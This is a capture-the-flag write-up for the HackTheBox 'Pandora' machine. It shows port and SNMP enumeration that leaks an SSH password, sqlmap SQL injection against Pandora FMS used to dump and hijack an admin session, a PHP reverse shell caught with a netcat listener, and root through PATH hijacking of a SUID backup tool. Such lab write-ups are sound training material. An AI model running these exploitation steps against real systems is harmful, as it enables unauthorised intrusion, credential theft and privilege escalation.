

This is my first writeup for a HackTheBox machine, as I usually do them on my own without documenting it, so I will try to be clear on every choice I make.

As per usual, let us start with an aggressive NMAP scan and see what we can do.

NMAP output
Starting Nmap 7.92 ( ) at 2022-04-17 21:17 CEST
Nmap scan report for pandora.htb (
Host is up (0.036s latency).
Not shown: 998 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
1   36.03 ms
2   36.13 ms pandora.htb (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds

Well, that is not really useful, but looks like there is a web app on port 80. We can see an interesting vhost called panda.htb, so let us add that to our /etc/hosts file.

Not much that we can do in the root page, other than a form that is useless to try XSS on, so let us throw a quick gobuster and ffuf scan for directories and subdomains, respectively

GoBuster Output
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://panda.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/04/17 21:21:25 Starting gobuster in directory enumeration mode
/assets               (Status: 301) [Size: 307] [--> http://panda.htb/assets/]
/server-status        (Status: 403) [Size: 274]                               
2022/04/17 21:24:11 Finished
FFUF Output
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://panda.htb -H "Host: FUZZ.panda.htb" -fw 13127

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3

 :: Method           : GET
 :: URL              : http://panda.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.panda.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 13127

:: Progress: [4990/4990] :: Job [1/1] :: 784 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

Well that is dissapointing, after that I decided to go back to NMAP for a UDP scan

NMAP UDP scan output
Starting Nmap 7.92 ( ) at 2022-04-17 21:26 CEST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 21:26
Scanning panda.htb ( [4 ports]
Completed Ping Scan at 21:26, 0.09s elapsed (1 total hosts)
Initiating UDP Scan at 21:26
Scanning panda.htb ( [1000 ports]
Increasing send delay for from 0 to 50 due to max_successful_tryno increase to 5
Increasing send delay for from 50 to 100 due to max_successful_tryno increase to 6
Warning: giving up on port because retransmission cap hit (6).
Increasing send delay for from 100 to 200 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 8.34% done; ETC: 21:32 (0:05:41 remaining)
Increasing send delay for from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 400 to 800 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 11.94% done; ETC: 21:34 (0:07:30 remaining)
UDP Scan Timing: About 14.74% done; ETC: 21:36 (0:08:46 remaining)
UDP Scan Timing: About 17.66% done; ETC: 21:37 (0:09:24 remaining)
Verbosity Increased to 2.
Stats: 0:04:52 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 33.84% done; ETC: 21:40 (0:09:31 remaining)
UDP Scan Timing: About 41.03% done; ETC: 21:41 (0:08:47 remaining)
UDP Scan Timing: About 47.49% done; ETC: 21:41 (0:08:02 remaining)
UDP Scan Timing: About 53.50% done; ETC: 21:41 (0:07:14 remaining)
UDP Scan Timing: About 59.21% done; ETC: 21:42 (0:06:25 remaining)
UDP Scan Timing: About 64.61% done; ETC: 21:42 (0:05:37 remaining)
UDP Scan Timing: About 70.01% done; ETC: 21:42 (0:04:48 remaining)
UDP Scan Timing: About 75.21% done; ETC: 21:42 (0:04:00 remaining)
Discovered open port 161/udp on

Perfect, finally we got something, so let us move onto the scanning.


Knowing the 161 SNMP UDP port is open, we should try an enumerating tool like SNMPWalk and see what we can get.

snmpwalk -v2c panda.htb -c public
iso. = STRING: "-f"
iso. = STRING: "-f"
iso. = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso. = STRING: "-f"
iso. = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/"
iso. = ""
iso. = STRING: "-k start"
iso. = STRING: "-o -p -- \\u --noclear tty1 linux"
iso. = STRING: "--no-debug"
iso. = ""
iso. = STRING: "-u daniel -p HotelBabylon23"
iso. = ""
iso. = STRING: "--user"

So finally we have some creds, now we can SSH as daniel user.

From enumerating a bit, we can see there is another web application running on the server

daniel@pandora:~$ ls /var/www
html  pandora
daniel@pandora:~$ ls /var/www/pandora/
index.html  pandora_console
daniel@pandora:~$ ls /var/www/pandora/pandora_console/
ajax.php       composer.lock         Dockerfile  godmode       mobile                            pandora_console_logrotate_ubuntu  tests
attachment     COPYING               extensions  images        operation                         pandora_console_upgrade           tools
audit.log      DB_Dockerfile         extras      include       pandora_console.log               pandoradb_data.sql                vendor
AUTHORS        DEBIAN                fonts       index.php     pandora_console_logrotate_centos  pandoradb.sql                     ws.php
composer.json  general     install.done  pandora_console_logrotate_suse    pandora_websocket_engine.service

But it is not open to the public, so we will have to do some port forwarding to our local machine. There is many ways to do this, but I will do it through SSH

Port forwarding server's port 80 to our localhost's port 9999
ssh daniel@panda.htb -L 9999:
daniel@panda.htb's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Sun 17 Apr 20:10:47 UTC 2022

  System load:           0.0
  Usage of /:            63.4% of 4.87GB
  Memory usage:          10%
  Swap usage:            0%
  Processes:             230
  Users logged in:       1
  IPv4 address for eth0:
  IPv6 address for eth0: dead:beef::250:56ff:feb9:33a4

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to Check your Internet connection or proxy settings

Last login: Sun Apr 17 20:10:30 2022 from

So we are greeted with a web application named "Pandora FMS" and a login form. Looking it up on google looks as if there is multiple vulnerabilities on it; one of them unauthenticated SQL injection on /include/chart_generator.php so let us try that.


The vulnerable URI is "http://localhost:9999/pandora_console/include/chart_generator.php?session_id=test", knowing that, let us intercept the request with Burp, save it to a "request.txt" file and feed it to SQLMap.

sqlmap -r request.txt --dbs
[23:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:13:00] [INFO] fetching database names
[23:13:00] [INFO] retrieved: 'information_schema'
[23:13:00] [INFO] retrieved: 'pandora'
available databases [2]:
[*] information_schema
[*] pandora

Let us see what is in the pandora DB

sqlmap -r request.txt -D pandora --tables
Database: pandora
[178 tables]
| taddress                           |
| taddress_agent                     |
| tagent_access                      |
| tagent_custom_data                 |
| tagent_custom_fields               |
| tagent_custom_fields_filter        |
| tagent_module_inventory            |
| tagent_module_log                  |
| tagent_repository                  |
| tagent_secondary_group             |
| tagente                            |
| tagente_datos                      |
| tagente_datos_inc                  |
| tagente_datos_inventory            |
| tagente_datos_log4x                |
| tagente_datos_string               |
| tagente_estado                     |
| tagente_modulo                     |
| talert_actions                     |
| talert_commands                    |
| talert_snmp                        |
| talert_snmp_action                 |
| talert_special_days                |
| talert_template_module_actions     |
| talert_template_modules            |
| talert_templates                   |
| tattachment                        |
| tautoconfig                        |
| tautoconfig_actions                |
| tautoconfig_rules                  |
| tcategory                          |
| tcluster                           |
| tcluster_agent                     |
| tcluster_item                      |
| tcollection                        |
| tconfig                            |
| tconfig_os                         |
| tcontainer                         |
| tcontainer_item                    |
| tcredential_store                  |
| tdashboard                         |
| tdatabase                          |
| tdeployment_hosts                  |
| tevent_alert                       |
| tevent_alert_action                |
| tevent_custom_field                |
| tevent_extended                    |
| tevent_filter                      |
| tevent_response                    |
| tevent_rule                        |
| tevento                            |
| textension_translate_string        |
| tfiles_repo                        |
| tfiles_repo_group                  |
| tgis_data_history                  |
| tgis_data_status                   |
| tgis_map                           |
| tgis_map_connection                |
| tgis_map_has_tgis_map_con          |
| tgis_map_layer                     |
| tgis_map_layer_groups              |
| tgis_map_layer_has_tagente         |
| tgraph                             |
| tgraph_source                      |
| tgraph_source_template             |
| tgraph_template                    |
| tgroup_stat                        |
| tgrupo                             |
| tincidencia                        |
| titem                              |
| tlanguage                          |
| tlayout                            |
| tlayout_data                       |
| tlayout_template                   |
| tlayout_template_data              |
| tlink                              |
| tlocal_component                   |
| tlog_graph_models                  |
| tmap                               |
| tmensajes                          |
| tmetaconsole_agent                 |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event                 |
| tmetaconsole_event_history         |
| tmetaconsole_setup                 |
| tmigration_module_queue            |
| tmigration_queue                   |
| tmodule                            |
| tmodule_group                      |
| tmodule_inventory                  |
| tmodule_relationship               |
| tmodule_synth                      |
| tnetflow_filter                    |
| tnetflow_report                    |
| tnetflow_report_content            |
| tnetwork_component                 |
| tnetwork_component_group           |
| tnetwork_map                       |
| tnetwork_matrix                    |
| tnetwork_profile                   |
| tnetwork_profile_component         |
| tnetworkmap_ent_rel_nodes          |
| tnetworkmap_enterprise             |
| tnetworkmap_enterprise_nodes       |
| tnews                              |
| tnota                              |
| tnotification_group                |
| tnotification_source               |
| tnotification_source_group         |
| tnotification_source_group_user    |
| tnotification_source_user          |
| tnotification_user                 |
| torigen                            |
| tpassword_history                  |
| tperfil                            |
| tphase                             |
| tplanned_downtime                  |
| tplanned_downtime_agents           |
| tplanned_downtime_modules          |
| tplugin                            |
| tpolicies                          |
| tpolicy_agents                     |
| tpolicy_alerts                     |
| tpolicy_alerts_actions             |
| tpolicy_collections                |
| tpolicy_groups                     |
| tpolicy_modules                    |
| tpolicy_modules_inventory          |
| tpolicy_plugins                    |
| tpolicy_queue                      |
| tprofile_view                      |
| tprovisioning                      |
| tprovisioning_rules                |
| trecon_script                      |
| trecon_task                        |
| trel_item                          |
| tremote_command                    |
| tremote_command_target             |
| treport                            |
| treport_content                    |
| treport_content_item               |
| treport_content_item_temp          |
| treport_content_sla_com_temp       |
| treport_content_sla_combined       |
| treport_content_template           |
| treport_custom_sql                 |
| treport_template                   |
| treset_pass                        |
| treset_pass_history                |
| tserver                            |
| tserver_export                     |
| tserver_export_data                |
| tservice                           |
| tservice_element                   |
| tsesion                            |
| tsesion_extended                   |
| tsessions_php                      |
| tskin                              |
| tsnmp_filter                       |
| ttag                               |
| ttag_module                        |
| ttag_policy_module                 |
| ttipo_modulo                       |
| ttransaction                       |
| ttrap                              |
| ttrap_custom_values                |
| tupdate                            |
| tupdate_journal                    |
| tupdate_package                    |
| tupdate_settings                   |
| tuser_double_auth                  |
| tuser_task                         |
| tuser_task_scheduled               |
| tusuario                           |
| tusuario_perfil                    |
| tvisual_console_elements_cache     |
| twidget                            |
| twidget_dashboard                  |

Well that is quite the database. Knowing we are after a session_id, there is a table named "tsessions_php", so let's dump it.

sqlmap -r request.txt -D pandora -T tsessions_php --dump
Database: pandora
Table: tsessions_php
[48 entries]
| id_session                 | data                                                                                                   | last_active |
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                                                                               | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                                                                   | 1638789018  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                                                                   | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                                                                   | 1638786129  |
| 2fb6a6ofi5c5gr9rih6q6eajet | NULL                                                                                                   | 1650231355  |
| 2g39hkugj5sdg2qalgpgvml63o | NULL                                                                                                   | 1650230954  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                                                                               | 1638540332  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                                                                   | 1638795380  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                                                                   | 1638786842  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                                                                               | 1638535373  |
| 541b95na0fcmcsp6opljhojpfs | NULL                                                                                                   | 1650231187  |
| 59qae699l0971h13qmbpqahlls | NULL                                                                                                   | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                                                                   | 1638792685  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                                                                               | 1638281946  |
| 66dtfimfsu71u6bfjbv7j5h9rd | id_usuario|s:6:"daniel";                                                                               | 1650230562  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                                                                               | 1641195617  |
| 6fs5onipp61e4vkt5hjnhd3lc8 | id_usuario|s:6:"daniel";                                                                               | 1650231114  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                                                                   | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                                                                               | 1638446321  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                                                                   | 1638787267  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                                                                               | 1638881787  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                                                                   | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                                                                               | 1638881664  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                                                                   | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                                                                   | 1638786277  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                                                                               | 1641200284  |
| f2sban0efcc1ecfin3dhoi88sl | NULL                                                                                                   | 1650231232  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                                                                   | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                                                                   | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                                                                               | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;                                                    | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                                                                   | 1638786349  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                                                                   | 1638540345  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                                                                               | 1638168492  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                                                                               | 1638456173  |
| jvk5c5s8rqq01grfeo77mer347 | id_usuario|s:6:"daniel";                                                                               | 1650231010  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                                                                   | 1638787808  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                                                                   | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                                                                               | 1638540482  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                                                                               | 1637667827  |
| p5s49h43f3gep5n5iat3skr6f4 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;csrf_code|s:32:"96bc1528afb4e66a70ed22648bb8bd97"; | 1650231045  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                                                                               | 1638168416  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                                                                   | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                                                                   | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                                                                               | 1638889082  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                                                                               | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                                                                               | 1638793297  |
| u7d6e9rvfheg1lee434g3c4g21 | NULL                                                                                                   | 1650230876  |

Now we have an admin session id, so let us try it on the web app.

Perfect, we are logged in as admin. So after looking a bit on what it can be done to make a reverse shell, I found a File Manager in the Admin Tools section that looks like could be used for this.

As always, my go to reverse shell for php is this one.

Finally we invoke it at "http://localhost:9999/pandora_console/images/reverse.php" and we are in as a more privileged user.

Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 21:44:03 up 22 min,  3 users,  load average: 0.03, 0.04, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0      21:23    3:42   0.04s  0.04s -bash
daniel   pts/1     21:23   20:07   0.03s  0.03s -bash
matt     pts/2      21:40   43.00s  0.05s  0.05s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/$ export TERM=xterm; export SHELL=/bin/bash
export TERM=xterm; export SHELL=/bin/bash
matt@pandora:/$ ^Z
zsh: suspended  nc -lvp 1337
└─$ stty raw -echo;fg
[1]  + continued  nc -lvp 1337

matt@pandora:/$ stty rows 50 columns 200
matt@pandora:/$ ls
bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  proc  root  run  sbin  srv  sys  tmp  usr  var

Grab the flag in matt's home directory and let us move onto root escalation.

Privilege Escalation

Enumerating SUID binaries we can see a suspicious one.

matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null

pandora_backup is not a standard SUID binary, so maybe we can do something with that.

matt@pandora:/home/matt$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!

Looks like it uses tar to process the backup; it does not use the full path (/usr/bin/tar) but the relative one, and since it is executed as root from the SUID permission perhaps we can inject our own malicious tar binary casting a shell. Let us try it and see.

matt@pandora:/$ cd tmp
matt@pandora:/tmp$ ls
matt@pandora:/tmp$ mkdir root
matt@pandora:/tmp$ cd root
matt@pandora:/tmp/root$ ls
matt@pandora:/tmp/root$ echo "/bin/bash">tar
matt@pandora:/tmp/root$ chmod +x tar
matt@pandora:/tmp/root$ export PATH=/tmp/root:$PATH
matt@pandora:/tmp/root$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp/root# id
uid=0(root) gid=1000(matt) groups=1000(matt)

Note: you are gonna need a SSH shell for this as the reverse shell did not work for me, so generate a key pair and append your public key in /home/matt/.ssh/authorized_keys.

Perfect, now just grab the flag from /root/root.txt. Hope you enjoyed it!